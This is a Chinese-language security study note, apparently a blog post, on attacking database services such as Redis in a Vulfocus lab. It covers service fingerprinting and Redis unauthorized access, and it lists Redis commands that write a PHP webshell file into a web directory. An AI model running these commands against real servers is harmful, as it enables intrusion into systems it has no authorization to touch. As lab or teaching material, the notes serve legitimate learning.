数据库安全&Redis&CouchDB&H2database&未授权访问&CVE 漏洞

前置知识:

1 、复现环境: Vulfocus( 官方在线的无法使用 )
官方手册: https://fofapro.github.io/vulfocus/#/
搭建踩坑:(无法同步)
https://blog.csdn.net/m0_64563956/article/details/131229046
2 、服务判断 :
端口扫描:利用服务开启后目标端口开放判断
组合判断:利用搭建常见组合分析可能开放服务
信息来源:访问端口提示软件版本,应用信息等
强弱特征:如框架 shiro 强特征 rememberMe,SpringBoot 默认页面等
3 、对象类别 :
对服务进行类别划分,通过服务功能理解,如数据库有帐号密码就有爆破利用方法,也可
以针对服务公开的 CVE 进行漏洞测试及服务常见的错误安全配置导致的未授权访问等。
4 、利用方法 :
主要集中在 CVE 漏洞,未授权访问,弱口令爆破等

数据库应用 -Redis- 未授权访问 &CVE 漏洞

默认端口: 6379
Redis 是一套开源的使用 ANSI C 编写、支持网络、可基于内存亦可持久化的日志型、
键值存储数据库,并提供多种语言的 API 。 Redis 如果在没有开启认证的情况下,可以
导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数
据。
1 、未授权访问: CNVD-2015-07557

  • 写 Webshell 需得到 Web 路径
    利用条件: Web 目录权限可读写
    config set dir /tmp # 设置 WEB 写入目录
    config set dbfilename 1.php # 设置写入文件名
    set test "<?php phpinfo();?>" # 设置写入文件代码
    bgsave # 保存执行
    save # 保存执行
    注意:部分没目录权限读写权限









相关推荐
小旺不正经23 分钟前
数据库表实现账号池管理
数据库·后端·算法
sanx1844 分钟前
一站式电竞平台解决方案:数据、直播、源码,助力业务飞速启航
前端·数据库·apache·数据库开发·时序数据库
学IT的周星星1 小时前
《MyBatis变形记:当SQL遇上“智能管家“》
数据库·sql·mybatis
byte轻骑兵1 小时前
突破文档型数据库迁移困境:金仓多模方案破解电子证照系统国产化难题
数据库
xdpcxq10292 小时前
EF Core框架数据库连接管理
java·jvm·数据库
期待のcode3 小时前
MyBatis框架—延迟加载与多级缓存
java·数据库·后端·缓存·mybatis
老华带你飞3 小时前
小区服务|基于Java+vue的小区服务管理系统(源码+数据库+文档)
java·数据库·vue.js·spring boot·论文·毕设·小区服务管理系统
柯南二号3 小时前
【Java后端】MyBatis 和 MyBatis-Plus (MP) 的区别
java·数据库·tomcat
C++chaofan3 小时前
游标查询在对话历史场景下的独特优势
java·前端·javascript·数据库·spring boot
小蒜学长3 小时前
springboot房地产销售管理系统的设计与实现(代码+数据库+LW)
java·数据库·spring boot·后端